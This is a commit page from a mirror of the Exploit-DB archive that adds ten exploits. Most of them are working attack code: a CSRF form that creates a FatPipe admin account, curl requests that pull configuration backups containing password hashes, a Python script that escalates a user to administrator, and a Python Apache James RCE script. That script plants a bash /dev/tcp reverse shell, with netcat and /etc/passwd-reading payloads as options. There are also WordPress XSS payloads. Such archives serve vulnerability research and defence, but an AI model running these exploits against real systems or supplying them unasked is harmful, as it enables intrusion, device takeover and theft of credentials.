bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-09-29

Browse source 
10 changes to exploits/shellcodes

Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF)
FatPipe Networks WARP 10.2.2 - Authorization Bypass
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation
WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated)
WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)
WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)
WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)
This commit is contained in:
Offensive Security 2021-09-29 05:02:13 +00:00
parent b104992c7d
commit d2b0bf596b
11 changed files with 853 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

108
exploits/hardware/webapps/50338.txt Normal file
View file

@ -0,0 +1,108 @@
# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF)
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com
<!--
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 CSRF Add Admin Exploit
Vendor: FatPipe Networks Inc.
Product web page: https://www.fatpipeinc.com
Affected version: WARP / IPVPN / MPVPN
10.2.2r38
10.2.2r25
10.2.2r10
10.1.2r60p82
10.1.2r60p71
10.1.2r60p65
10.1.2r60p58s1
10.1.2r60p58
10.1.2r60p55
10.1.2r60p45
10.1.2r60p35
10.1.2r60p32
10.1.2r60p13
10.1.2r60p10
9.1.2r185
9.1.2r180p2
9.1.2r165
9.1.2r164p5
9.1.2r164p4
9.1.2r164
9.1.2r161p26
9.1.2r161p20
9.1.2r161p17
9.1.2r161p16
9.1.2r161p12
9.1.2r161p3
9.1.2r161p2
9.1.2r156
9.1.2r150
9.1.2r144
9.1.2r129
7.1.2r39
6.1.2r70p75-m
6.1.2r70p45-m
6.1.2r70p26
5.2.0r34
Summary: FatPipe Networks invented the concept of router-clustering,
which provides the highest level of reliability, redundancy, and speed
of Internet traffic for Business Continuity and communications. FatPipe
WARP achieves fault tolerance for companies by creating an easy method
of combining two or more Internet connections of any kind over multiple
ISPs. FatPipe utilizes all paths when the lines are up and running,
dynamically balancing traffic over the multiple lines, and intelligently
failing over inbound and outbound IP traffic when ISP services and/or
components fail.
FatPipe IPVPN balances load and provides reliability among multiple
managed and CPE based VPNs as well as dedicated private networks. FatPipe
IPVPN can also provide you an easy low-cost migration path from private
line, Frame or Point-to-Point networks. You can aggregate multiple private,
MPLS and public networks without additional equipment at the provider's
site.
FatPipe MPVPN, a patented router clustering device, is an essential part
of Disaster Recovery and Business Continuity Planning for Virtual Private
Network (VPN) connectivity. It makes any VPN up to 900% more secure and
300% times more reliable, redundant and faster. MPVPN can take WANs with
an uptime of 99.5% or less and make them 99.999988% or higher, providing
a virtually infallible WAN. MPVPN dynamically balances load over multiple
lines and ISPs without the need for BGP programming. MPVPN aggregates up
to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
you need to keep your VPN up and running despite failures of service, line,
software, or hardware.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Apache-Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5681
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5681.php
30.05.2016
25.07.2021
-->
<html>
<body>
<form action="https://10.0.0.7/fpui/userServlet?loadType=set&block=userSetRequest" method="POST">
<input type="hidden" name="userList" value='[{"userName":"adminz","privilege":"1","password":"TestPwd17","action":"add","state":false}]' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

81
exploits/hardware/webapps/50339.txt Normal file
View file

@ -0,0 +1,81 @@
# Exploit Title: FatPipe Networks WARP 10.2.2 - Authorization Bypass
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com
FatPipe Networks WARP 10.2.2 Authorization Bypass
Vendor: FatPipe Networks Inc.
Product web page: https://www.fatpipeinc.com
Affected version: WARP
10.2.2r38
10.2.2r25
10.2.2r10
10.1.2r60p82
10.1.2r60p71
10.1.2r60p65
10.1.2r60p58s1
10.1.2r60p58
10.1.2r60p55
10.1.2r60p45
10.1.2r60p35
10.1.2r60p32
10.1.2r60p13
10.1.2r60p10
9.1.2r185
9.1.2r180p2
9.1.2r165
9.1.2r164p5
9.1.2r164p4
9.1.2r164
9.1.2r161p26
9.1.2r161p20
9.1.2r161p17
9.1.2r161p16
9.1.2r161p12
9.1.2r161p3
9.1.2r161p2
9.1.2r156
9.1.2r150
9.1.2r144
9.1.2r129
7.1.2r39
6.1.2r70p75-m
6.1.2r70p45-m
6.1.2r70p26
5.2.0r34
Summary: FatPipe Networks invented the concept of router-clustering,
which provides the highest level of reliability, redundancy, and speed
of Internet traffic for Business Continuity and communications. FatPipe
WARP achieves fault tolerance for companies by creating an easy method
of combining two or more Internet connections of any kind over multiple
ISPs. FatPipe utilizes all paths when the lines are up and running,
dynamically balancing traffic over the multiple lines, and intelligently
failing over inbound and outbound IP traffic when ISP services and/or
components fail.
Desc: Improper access control occurs when the application provides direct
access to objects based on user-supplied input. As a result of this vulnerability
attackers can bypass authorization and access resources behind protected
pages.
Tested on: Apache-Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5682
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php
30.05.2016
25.07.2021
--
$ curl -vk "https://10.0.0.9/fpui/jsp/index.jsp"

182
exploits/hardware/webapps/50340.txt Normal file
View file

@ -0,0 +1,182 @@
# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Unauthenticated Config Download
Vendor: FatPipe Networks Inc.
Product web page: https://www.fatpipeinc.com
Affected version: WARP / IPVPN / MPVPN
10.2.2r38
10.2.2r25
10.2.2r10
10.1.2r60p82
10.1.2r60p71
10.1.2r60p65
10.1.2r60p58s1
10.1.2r60p58
10.1.2r60p55
10.1.2r60p45
10.1.2r60p35
10.1.2r60p32
10.1.2r60p13
10.1.2r60p10
9.1.2r185
9.1.2r180p2
9.1.2r165
9.1.2r164p5
9.1.2r164p4
9.1.2r164
9.1.2r161p26
9.1.2r161p20
9.1.2r161p17
9.1.2r161p16
9.1.2r161p12
9.1.2r161p3
9.1.2r161p2
9.1.2r156
9.1.2r150
9.1.2r144
9.1.2r129
7.1.2r39
6.1.2r70p75-m
6.1.2r70p45-m
6.1.2r70p26
5.2.0r34
Summary: FatPipe Networks invented the concept of router-clustering,
which provides the highest level of reliability, redundancy, and speed
of Internet traffic for Business Continuity and communications. FatPipe
WARP achieves fault tolerance for companies by creating an easy method
of combining two or more Internet connections of any kind over multiple
ISPs. FatPipe utilizes all paths when the lines are up and running,
dynamically balancing traffic over the multiple lines, and intelligently
failing over inbound and outbound IP traffic when ISP services and/or
components fail.
FatPipe IPVPN balances load and provides reliability among multiple
managed and CPE based VPNs as well as dedicated private networks. FatPipe
IPVPN can also provide you an easy low-cost migration path from private
line, Frame or Point-to-Point networks. You can aggregate multiple private,
MPLS and public networks without additional equipment at the provider's
site.
FatPipe MPVPN, a patented router clustering device, is an essential part
of Disaster Recovery and Business Continuity Planning for Virtual Private
Network (VPN) connectivity. It makes any VPN up to 900% more secure and
300% times more reliable, redundant and faster. MPVPN can take WANs with
an uptime of 99.5% or less and make them 99.999988% or higher, providing
a virtually infallible WAN. MPVPN dynamically balances load over multiple
lines and ISPs without the need for BGP programming. MPVPN aggregates up
to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
you need to keep your VPN up and running despite failures of service, line,
software, or hardware.
Desc: The application is vulnerable to unauthenticated configuration disclosure
when direct object reference is made to the backup archive file using an HTTP
GET request. The only unknown part of the filename is the hostname of the system.
This will enable the attacker to disclose sensitive information and help her
in authentication bypass, privilege escalation and full system access.
Tested on: Apache-Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5683
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5683.php
30.05.2016
25.07.2021
--
Products:
---------
WARP / MPVPN / IPVPN
Format:
-------
https://[TARGET]/fpui/[HostName]-config-[Product]-[Version]-mcore.tar.gz
Examples:
---------
curl -sk https://10.0.0.7/fpui/ZSLAB-config-WARP-9.1.2r161p19-mcore.tar.gz # For WARP
curl -sk https://10.0.0.8/fpui/testingus-config-VPN-10.2.2r38-mcore.tar.gz # For MPVPN/IPVPN
Version:
--------
$ curl -sk https://10.0.0.9/fpui/jsp/login.jsp |findstr /spina:d "10.2"
103: <h5>10.2.2r38</h5>
Product:
--------
$ curl -sk https://10.0.0.9/fpui/jsp/login.jsp |findstr /spina:d "FatPipe"
15: <title>FatPipe MPVPN&nbsp;| Log in</title>
Content:
--------
$ tar -xf testingus-config-VPN-10.2.2r38-mcore.tar.gz
$ cd etc
$ cat Xpasswd
Administrator:26df420bcb78bb02eef532d51aea22e2:1
fatpipe:3b5afbb47fc3067d62d73f5bb1f92b5b:1
$ ls
.
..
auto_config.conf
bird.conf
bridge.conf
cm.conf
crontab
dhcpd.conf
dnssec.conf
dynamic_route.conf
fatpipe
fileserver.conf
fp_arp.conf
fp_config.dtd
fp_distributed_global_rule
fp_global_rule
fp_version
haproxy
hosts
interface_access_list.conf
ipsec.conf
ipsec.d
ipsec.secrets
ipsec_cert_secrets
ipsec_shared_secrets
ipsec_subnet.conf
ipsec_xauth.conf
ipv4_dynamic_routing.conf
logrotate.d
manifest
named.conf
network_object.conf
ntp.conf
ppp
radiusclient
resolv.conf
rsyslog.conf
site.xml
site.xml.org
snmp_config.conf
squid
sysconfig
syslog.conf
tcp-congestion-table.conf
tcp-congestion-table.conf.org
webfilter.conf
xgreet.txt
xnetmap.conf
Xpasswd
xsnmp.conf
xtreme_conf.xml

118
exploits/hardware/webapps/50341.txt Normal file
View file

@ -0,0 +1,118 @@
# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account (Write Access)
Vendor: FatPipe Networks Inc.
Product web page: https://www.fatpipeinc.com
Affected version: WARP / IPVPN / MPVPN
10.2.2r38
10.2.2r25
10.2.2r10
10.1.2r60p82
10.1.2r60p71
10.1.2r60p65
10.1.2r60p58s1
10.1.2r60p58
10.1.2r60p55
10.1.2r60p45
10.1.2r60p35
10.1.2r60p32
10.1.2r60p13
10.1.2r60p10
9.1.2r185
9.1.2r180p2
9.1.2r165
9.1.2r164p5
9.1.2r164p4
9.1.2r164
9.1.2r161p26
9.1.2r161p20
9.1.2r161p17
9.1.2r161p16
9.1.2r161p12
9.1.2r161p3
9.1.2r161p2
9.1.2r156
9.1.2r150
9.1.2r144
9.1.2r129
7.1.2r39
6.1.2r70p75-m
6.1.2r70p45-m
6.1.2r70p26
5.2.0r34
Summary: FatPipe Networks invented the concept of router-clustering,
which provides the highest level of reliability, redundancy, and speed
of Internet traffic for Business Continuity and communications. FatPipe
WARP achieves fault tolerance for companies by creating an easy method
of combining two or more Internet connections of any kind over multiple
ISPs. FatPipe utilizes all paths when the lines are up and running,
dynamically balancing traffic over the multiple lines, and intelligently
failing over inbound and outbound IP traffic when ISP services and/or
components fail.
FatPipe IPVPN balances load and provides reliability among multiple
managed and CPE based VPNs as well as dedicated private networks. FatPipe
IPVPN can also provide you an easy low-cost migration path from private
line, Frame or Point-to-Point networks. You can aggregate multiple private,
MPLS and public networks without additional equipment at the provider's
site.
FatPipe MPVPN, a patented router clustering device, is an essential part
of Disaster Recovery and Business Continuity Planning for Virtual Private
Network (VPN) connectivity. It makes any VPN up to 900% more secure and
300% times more reliable, redundant and faster. MPVPN can take WANs with
an uptime of 99.5% or less and make them 99.999988% or higher, providing
a virtually infallible WAN. MPVPN dynamically balances load over multiple
lines and ISPs without the need for BGP programming. MPVPN aggregates up
to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
you need to keep your VPN up and running despite failures of service, line,
software, or hardware.
Desc: The application has a hidden administrative account 'cmuser' that has
no password and has write access permissions to the device. The user cmuser
is not visible in Users menu list of the application.
Tested on: Apache-Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5684
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php
30.05.2016
25.07.2021
--
Overview:
FatPipe Central Manager is a secure web based solution providing a centralized solution
to manage FatPipe's suite of WAN reliability and optimization products. Central Manager
allows you to configure, manage and monitor FatPipe's patented MPSec technology at the
click of a button.
Central Manager = cmuser.
Once authenticated, you get admin rights.
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Strict-Transport-Security: max-age=31536000
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 118
Date: Fri, 06 Aug 2017 16:37:07 GMT
Connection: close
{"loginRes":"success","userName":"userName","userAccess":"writeAccess","activeUserName":"cmuser","message":"noError"}

191
exploits/hardware/webapps/50342.py Executable file
View file

@ -0,0 +1,191 @@
# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com
#!/usr/bin/env python3
#
#
# FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation
#
#
# Vendor: FatPipe Networks Inc.
# Product web page: https://www.fatpipeinc.com
# Affected version: WARP / IPVPN / MPVPN
# 10.2.2r38
# 10.2.2r25
# 10.2.2r10
# 10.1.2r60p82
# 10.1.2r60p71
# 10.1.2r60p65
# 10.1.2r60p58s1
# 10.1.2r60p58
# 10.1.2r60p55
# 10.1.2r60p45
# 10.1.2r60p35
# 10.1.2r60p32
# 10.1.2r60p13
# 10.1.2r60p10
# 9.1.2r185
# 9.1.2r180p2
# 9.1.2r165
# 9.1.2r164p5
# 9.1.2r164p4
# 9.1.2r164
# 9.1.2r161p26
# 9.1.2r161p20
# 9.1.2r161p17
# 9.1.2r161p16
# 9.1.2r161p12
# 9.1.2r161p3
# 9.1.2r161p2
# 9.1.2r156
# 9.1.2r150
# 9.1.2r144
# 9.1.2r129
# 7.1.2r39
# 6.1.2r70p75-m
# 6.1.2r70p45-m
# 6.1.2r70p26
# 5.2.0r34
#
# Summary: FatPipe Networks invented the concept of router-clustering,
# which provides the highest level of reliability, redundancy, and speed
# of Internet traffic for Business Continuity and communications. FatPipe
# WARP achieves fault tolerance for companies by creating an easy method
# of combining two or more Internet connections of any kind over multiple
# ISPs. FatPipe utilizes all paths when the lines are up and running,
# dynamically balancing traffic over the multiple lines, and intelligently
# failing over inbound and outbound IP traffic when ISP services and/or
# components fail.
#
# FatPipe IPVPN balances load and provides reliability among multiple
# managed and CPE based VPNs as well as dedicated private networks. FatPipe
# IPVPN can also provide you an easy low-cost migration path from private
# line, Frame or Point-to-Point networks. You can aggregate multiple private,
# MPLS and public networks without additional equipment at the provider's
# site.
#
# FatPipe MPVPN, a patented router clustering device, is an essential part
# of Disaster Recovery and Business Continuity Planning for Virtual Private
# Network (VPN) connectivity. It makes any VPN up to 900% more secure and
# 300% times more reliable, redundant and faster. MPVPN can take WANs with
# an uptime of 99.5% or less and make them 99.999988% or higher, providing
# a virtually infallible WAN. MPVPN dynamically balances load over multiple
# lines and ISPs without the need for BGP programming. MPVPN aggregates up
# to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
# you need to keep your VPN up and running despite failures of service, line,
# software, or hardware.
#
# Desc: The application suffers from a privilege escalation vulnerability.
# A normal user (group USER, 0) can elevate her privileges by sending a HTTP
# POST request and setting the JSON parameter 'privilege' to integer value
# '1' gaining administrative rights (group ADMINISTRATOR, 1).
#
# Tested on: Apache-Coyote/1.1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2021-5685
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php
#
#
# 30.05.2016
# 25.07.2021
#
#
import sys
import time#######
import requests################
requests.packages.urllib3.disable_warnings()
if len(sys.argv) !=2:
print
print("********************************************************")
print("* *")
print("* Privilege escalation from USER to ADMINISTRATOR role *")
print("* in *")
print("* FatPipe WARP/IPVPN/MPVPN v10.2.2 *")
print("* *")
print("* ZSL-2021-5685 *")
print("* *")
print("********************************************************")
print("\n[POR] Usage: ./escalator.py [IP]")
sys.exit()
ajpi=sys.argv[1]
print
juzer=raw_input("[UNE] Username: ")
pasvord=raw_input("[UNE] Password: ")
sesija=requests.session()
logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'}
hederi={'Sec-Ch-Ua' :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"',
'Accept' :'application/json, text/javascript, */*; q=0.01',
'X-Requested-With':'XMLHttpRequest',
'Sec-Ch-Ua-Mobile':'?0',
'User-Agent' :'Fatnet/1.b',
'Content-Type' :'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' :'https://'+ajpi,
'Sec-Fetch-Site' :'same-origin',
'Sec-Fetch-Mode' :'cors',
'Sec-Fetch-Dest' :'empty',
'Referer' :'https://'+ajpi+'/fpui/dataCollectionServlet',
'Accept-Encoding' :'gzip, deflate',
'Accept-Language' :'en-US,en;q=0.9',
'Connection' :'close'}
juarel1='https://'+ajpi+'/fpui/loginServlet'
alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False)
if not 'success' in alo.text:
print('[GRE] Login error.')
sys.exit()
else:
print('[POR] Authentication successful.')
print('[POR] Climbing the ladder...')
sluba='''
|| || .--._
||====|| __ '---._)
|| ||"")\ Q Q )
||====|| =_/ o /
|| || | \_.-;-'-,._
||====|| | ' o---o )
|| || \ /H __H\ /
||====|| '-' \"")\/ |
|| || _ |_='-)_/
||====|| / '. )
|| || / /
||====|| |___/\| /
|| || |_| | |
||====|| / ) \\ \\
|| || (__/ \___\\
||====|| \_\\
|| || / )
||====|| (__/
'''
for k in sluba:
sys.stdout.write(k)
sys.stdout.flush()
time.sleep(0.01)
juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest'
posta={
'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]'
}
stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False)
if not 'true' in stanje.text:
print('\n[GRE] Something\'s fishy!')
sys.exit()
else:
print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.')
sys.exit()

103
exploits/linux/remote/50347.py Executable file
View file

@ -0,0 +1,103 @@
# Exploit Title: Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)
# Date: 27/09/2021
# Exploit Author: shinris3n
# Vendor Homepage: http://james.apache.org/server/
# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
# Version: Apache James Server 2.3.2
# Tested on: Ubuntu
# Info: This exploit works on default installation of Apache James Server 2.3.2
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d
'''
This Python 3 implementation is based on the original (Python 2) exploit code developed by
Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec. The following modifications were made:
1 - Made required changes to print and socket commands for Python 3 compatibility.
1 - Changed the default payload to a basic bash reverse shell script and added a netcat option.
2 - Changed the command line syntax to allow user input of remote ip, local ip and listener port to correspond with #2.
3 - Added a payload that can be used for testing remote command execution and connectivity.
4 - Added payload and listener information output based on payload selection and user input.
5 - Added execution output clarifications and additional informational comments throughout the code.
@shinris3n
https://twitter.com/shinris3n
https://shinris3n.github.io/
'''
#!/usr/bin/python3
import socket
import sys
import time
# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'
if len(sys.argv) != 4:
sys.stderr.write("[-]Usage: python3 %s <remote ip> <local ip> <local listener port>\n" % sys.argv[0])
sys.stderr.write("[-]Example: python3 %s 172.16.1.66 172.16.1.139 443\n" % sys.argv[0])
sys.stderr.write("[-]Note: The default payload is a basic bash reverse shell - check script for details and other options.\n")
sys.exit(1)
remote_ip = sys.argv[1]
local_ip = sys.argv[2]
port = sys.argv[3]
# Select payload prior to running script - default is a reverse shell executed upon any user logging in (i.e. via SSH)
payload = '/bin/bash -i >& /dev/tcp/' + local_ip + '/' + port + ' 0>&1' # basic bash reverse shell exploit executes after user login
#payload = 'nc -e /bin/sh ' + local_ip + ' ' + port # basic netcat reverse shell
#payload = 'echo $USER && cat /etc/passwd && ping -c 4 ' + local_ip # test remote command execution capabilities and connectivity
#payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # proof of concept exploit on root user login only
print ("[+]Payload Selected (see script for more options): ", payload)
if '/bin/bash' in payload:
print ("[+]Example netcat listener syntax to use after successful execution: nc -lvnp", port)
def recv(s):
s.recv(1024)
time.sleep(0.2)
try:
print ("[+]Connecting to James Remote Administration Tool...")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((remote_ip,4555)) # Assumes James Remote Administration Tool is running on Port 4555, change if necessary.
s.recv(1024)
s.send((user + "\n").encode('utf-8'))
s.recv(1024)
s.send((pwd + "\n").encode('utf-8'))
s.recv(1024)
print ("[+]Creating user...")
s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n".encode('utf-8'))
s.recv(1024)
s.send("quit\n".encode('utf-8'))
s.close()
print ("[+]Connecting to James SMTP server...")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((remote_ip,25)) # Assumes default SMTP port, change if necessary.
s.send("ehlo team@team.pl\r\n".encode('utf-8'))
recv(s)
print ("[+]Sending payload...")
s.send("mail from: <'@team.pl>\r\n".encode('utf-8'))
recv(s)
# also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n".encode('utf-8')) if the recipient cannot be found
s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n".encode('utf-8'))
recv(s)
s.send("data\r\n".encode('utf-8'))
recv(s)
s.send("From: team@team.pl\r\n".encode('utf-8'))
s.send("\r\n".encode('utf-8'))
s.send("'\n".encode('utf-8'))
s.send((payload + "\n").encode('utf-8'))
s.send("\r\n.\r\n".encode('utf-8'))
recv(s)
s.send("quit\r\n".encode('utf-8'))
recv(s)
s.close()
print ("[+]Done! Payload will be executed once somebody logs in (i.e. via SSH).")
if '/bin/bash' in payload:
print ("[+]Don't forget to start a listener on port", port, "before logging in!")
except:
print ("Connection failed.")

21
exploits/php/webapps/50343.txt Normal file
View file

@ -0,0 +1,21 @@
# Exploit Title: WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 06-08-2021
# Exploit Author: Nosa Shandy (Apapedulimu)
# Vendor Homepage: https://translatepress.com/
# Software Link: https://wordpress.org/plugins/translatepress-multilingual/
# Reference: https://wpscan.com/vulnerability/b87fcc2f-c2eb-4e23-9757-d1c590f26d3f
# Version: 2.0.6
# Tested on: macOS 11.4
# CVE : CVE-2021-24610
Description:
The plugin does not implement a proper filter on the 'translated' parameter when input to the database. The 'trp_sanitize_string' function only check the "<script></script>" with the preg_replace, the attacker can use the HTML Tag to execute javascript.
Step To Reproduce:
1. Go to http://localhost:8888/wordpress/?trp-edit-translation=true
2. Input Gettext String
3. Input the payload such as <img src=x onerror=alert(4)>
4. Save, The payload will be executed.
5. Look on the homepage will be affected.
Video : https://drive.google.com/file/d/1PnvjHuKCvjmom6xz_sxNLBu3jixCiHy_/view?usp=sharing

13
exploits/php/webapps/50344.txt Normal file
View file

@ -0,0 +1,13 @@
# Exploit Title: WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/
# Version: 1.7.14
# Tested on: Windows 10
# CVE: CVE-2021-24276
1. Description:
The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
2. Proof of Concept:
/wp-admin/admin.php?page=contact-form-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//

13
exploits/php/webapps/50345.txt Normal file
View file

@ -0,0 +1,13 @@
# Exploit Title: WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/ultimate-maps-by-supsystic/
# Version: 1.2.4
# Tested on: Windows 10
# CVE: CVE-2021-24274
1. Description:
The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
2. Proof of Concept:
/wp-admin/admin.php?page=ultimate-maps-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//

13
exploits/php/webapps/50346.txt Normal file
View file

@ -0,0 +1,13 @@
# Exploit Title: WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/popup-by-supsystic/
# Version: 1.10.4
# Tested on: Windows 10
# CVE: CVE-2021-24275
1. Description:
The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
2. Proof of Concept:
/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//

10
files_exploits.csv
View file

@ -18539,6 +18539,7 @@ id,file,description,date,author,type,platform,port
50216,exploits/linux/remote/50216.py,"crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow",1970-01-01,"Khaled Salem",remote,linux,
50282,exploits/hardware/remote/50282.txt,"ECOA Building Automation System - Hard-coded Credentials SSH Access",1970-01-01,Neurogenesia,remote,hardware,
50335,exploits/hardware/remote/50335.py,"Cisco small business RV130W 1.0.3.44 - Inject Counterfeit Routers",1970-01-01,"Michael Alamoot",remote,hardware,
50347,exploits/linux/remote/50347.py,"Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)",1970-01-01,shinris3n,remote,linux,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -44453,3 +44454,12 @@ id,file,description,date,author,type,platform,port
50329,exploits/php/webapps/50329.txt,"Pharmacy Point of Sale System 1.0 - SQLi Authentication BYpass",1970-01-01,"Janik Wehrli",webapps,php,
50333,exploits/php/webapps/50333.txt,"WordPress Plugin Wappointment 2.2.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Renos Nikolaou",webapps,php,
50334,exploits/php/webapps/50334.txt,"Library System 1.0 - 'student_id' SQL injection (Authenticated)",1970-01-01,"Vinay Bhuria",webapps,php,
50338,exploits/hardware/webapps/50338.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,hardware,
50339,exploits/hardware/webapps/50339.txt,"FatPipe Networks WARP 10.2.2 - Authorization Bypass",1970-01-01,LiquidWorm,webapps,hardware,
50340,exploits/hardware/webapps/50340.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
50341,exploits/hardware/webapps/50341.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)",1970-01-01,LiquidWorm,webapps,hardware,
50342,exploits/hardware/webapps/50342.py,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation",1970-01-01,LiquidWorm,webapps,hardware,
50343,exploits/php/webapps/50343.txt,"WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Nosa Shandy",webapps,php,
50344,exploits/php/webapps/50344.txt,"WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
50345,exploits/php/webapps/50345.txt,"WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
